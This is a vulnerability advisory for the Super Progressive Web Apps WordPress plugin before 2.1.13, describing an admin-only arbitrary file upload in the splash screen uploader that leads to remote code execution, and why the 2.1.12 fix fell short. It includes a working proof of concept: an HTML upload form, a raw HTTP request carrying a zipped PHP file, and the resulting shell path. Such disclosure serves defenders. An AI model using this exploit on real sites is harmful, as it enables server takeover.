Super Progressive Web Apps < 2.1.13 – Authenticated (High Privileged) Arbitrary File Upload to RCE

Description

When the Apple Touch Icons & Splash Screen add-on is active, its superpwa_splashscreen_uploader AJAX action, did not properly check for authorisation and the content of the uploaded archive file. This allows high privilege users (admin+) to upload an archive with a PHP file, leading to RCE.

v2.1.12 attempted to fix the issue by deleting potential malicious files, after extracting the archive, but was checking the wrong folder. And even if the correct folder was checked, a race condition could have been used to exploit the issue

Proof of Concept

Login to the blog as an admin, grab the nonce via the source of /wp-admin/admin.php?page=superpwa-apple-icons (the Apple touch icons & splash screen needs to be active), ie "var superpwaIosScreen = {"nonce":"XXXXXXXX"};"

Save the code below in an HTML file (replace the example.com by the correct domain), then open it in the same browser used to log on to the blog, add the nonce grabbed earlier and select an archive of a PHP file

<html>
<body>
  <form method="POST" enctype="multipart/form-data" action="https://example.com/wp-admin/admin-ajax.php">
    <input type="hidden" name="action" value="superpwa_splashscreen_uploader"/>
    Zipped PHP File
    <input type="file" name="file"/><br/><br/>
    Nonce (Login as admin and get it from the source of /wp-admin/admin.php?page=superpwa-apple-icons: "var superpwaIosScreen = {"nonce":"XXXXXXXX"};")<br/>
    <input type="text" name="security_nonce"><br/><br/>
    <input type="submit" value="Upload"/>
  </form>
</body>


POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------34156245217942151802178343738
Content-Length: 724
Connection: close
Cookie: [admin cookies]
Upgrade-Insecure-Requests: 1

-----------------------------34156245217942151802178343738
Content-Disposition: form-data; name="action"

superpwa_splashscreen_uploader
-----------------------------34156245217942151802178343738
Content-Disposition: form-data; name="file"; filename="134.zip"
Content-Type: application/zip

PK���IE������������ �134-zipped.phpUT
�ô¤6TlMÖ]�)p`ux�õ�����³±/È(PHMÎÈWPwsôôquQ·V°·ã�PK^Ý}u������PK���IE^Ý}u������� ���������ÿ����134-zipped.phpUT
�ô¤6TlMÖ]�)p`ux�õ�����PK������\���v�����
-----------------------------34156245217942151802178343738
Content-Disposition: form-data; name="security_nonce"

f702fd7016
-----------------------------34156245217942151802178343738--


PHP will be at https://example.com/wp-content/uploads/superpwa-splashIcons/134-zipped.php